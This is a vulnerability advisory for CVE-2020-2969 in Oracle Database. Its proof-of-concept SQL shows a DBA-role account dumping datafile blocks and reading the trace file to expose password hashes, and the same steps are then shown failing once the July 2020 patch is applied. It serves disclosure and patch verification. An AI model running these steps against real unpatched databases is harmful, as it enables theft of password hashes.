Title: CVE-2020-2969 – Unauthorized Access to Password Hashes by Account with DBA role
Product:                   Database
Manufacturer:              Oracle
Affected Version(s):       11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c
Tested Version(s):         11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c
Risk Level:                Medium
Solution Status:           Fixed
CVE Reference:             CVE-2020-2969
Base Score:                6.6 
Author of Advisory:        Emad Al-Mousa


*****************************************
Vulnerability Details:

Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Data Pump. Successful attacks of this vulnerability can result in takeover of Data Pump.

The presented  scenarios illustrates that an account with “DBA” role can still view/extract the password hashes although the account can’t directly query SYS.USER$ table as a security enhancement since “select any dictionary” system privilege doesn’t provide access to SYS.USER$ anymore

*****************************************
Proof of Concept (PoC):

This simulation was performed in Oracle Non-CDB environment, and is applicable of course in CDB setup also.

SQL> create user ninja identified by hello_123;


SQL> grant create session to ninja;


SQL> grant dba to ninja;


SQL> alter user ninja default role all;


*** when attempting to select from SYS.USER$ the account will not be able since the system privilege “SELECT ANY DICTIONARY” is changed by restricting direct access to multiple SYS tables such as USER$, ENC$,DEFAULT_PWD$, LINK$, USER_HISTORY$, CDB_LOCAL_ADMINAUTH$

SQL> select * from sys.user$;
select * from sys.user$
                  *
ERROR at line 1:
ORA-01031: insufficient privileges

** I will perform dump to the system data file to gain access to the hashed passwords

SQL> alter system dump datafile 1 block min 210 block max 215;

** Then immediately I will check the generated trace file name using the query:

SQL> select * from v$diag_info where NAME='Default Trace File';

** I will query the “payload” column of the view V$DIAG_TRACE_FILE that will read the generated trace file contents:

SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ORCLCDB_ora_6029.trc';

// the password hash will be exposed in the trace file !

After applying Oracle July 2020 CPU patches- try to re-simulate again:

SQL> create user ninja identified by hello_123;
 
 
SQL> grant create session to ninja;
 
 
SQL> grant dba to ninja;
 
 
SQL> alter user ninja default role all;
 
 
SQL> show user
USER is "NINJA"

SQL> select * from sys.user$;
select * from sys.user$
                  *
ERROR at line 1:
ORA-01031: insufficient privileges
 
 
SQL> alter system dump datafile 1 block min 210 block max 215;
alter system dump datafile 1 block min 210 block max 215
*
ERROR at line 1:
ORA-01031: insufficient privileges
 
SQL> select * from v$diag_info where NAME='Default Trace File';
 
   INST_ID NAME
---------- ----------------------------------------------------------------
VALUE
--------------------------------------------------------------------------------
    CON_ID
----------
         1 Default Trace File
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171
16.trc
 

SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ora5_ora_117116.trc';
 
PAYLOAD
--------------------------------------------------------------------------------
Trace file 
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171
16.trc
 
Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production
Version 19.8.0.0.0
Build label:    RDBMS_19.8.0.0.0DBRU_LINUX.X64_200702
ORACLE_HOME:    /oraclex/oradbp05/product/19.3
System name:    Linux
Node name:      boba
Release:        3.10.0-1127.13.1.el7.x86_64
Version:        #1 SMP Fri Jun 12 14:34:17 EDT 2020
 
PAYLOAD
--------------------------------------------------------------------------------
Machine:        x86_64
Instance name: ora5
Redo thread mounted by this instance: 1
Oracle process number: 69
Unix process pid: 117116, image: oracle@boba (TNS V1-V3)
 
 
*** 2020-07-16T11:09:31.240875+03:00
 
*** SESSION ID:(1174.5281) 2020-07-16T11:09:31.240917+03:00
*** CLIENT ID:() 2020-07-16T11:09:31.240926+03:00
 
PAYLOAD
--------------------------------------------------------------------------------
*** SERVICE NAME:(SYS$USERS) 2020-07-16T11:09:31.240932+03:00
*** MODULE NAME:(SQL*Plus) 2020-07-16T11:09:31.240938+03:00
*** ACTION NAME:() 2020-07-16T11:09:31.240943+03:00
*** CLIENT DRIVER:(SQL*PLUS) 2020-07-16T11:09:31.240948+03:00
 
Error: file 1 can only be dumped with SYSDBA privillege



*****************************************
References:
https://www.oracle.com/security-alerts/cpujul2020.html
https://www.oracle.com/security-alerts/cpujul2020verbose.html
https://nvd.nist.gov/vuln/detail/CVE-2020-2969
https://databasesecurityninja.wordpress.com/2024/06/10/cve-2020-2969-unauthorized-access-to-password-hashes-by-account-with-dba-role/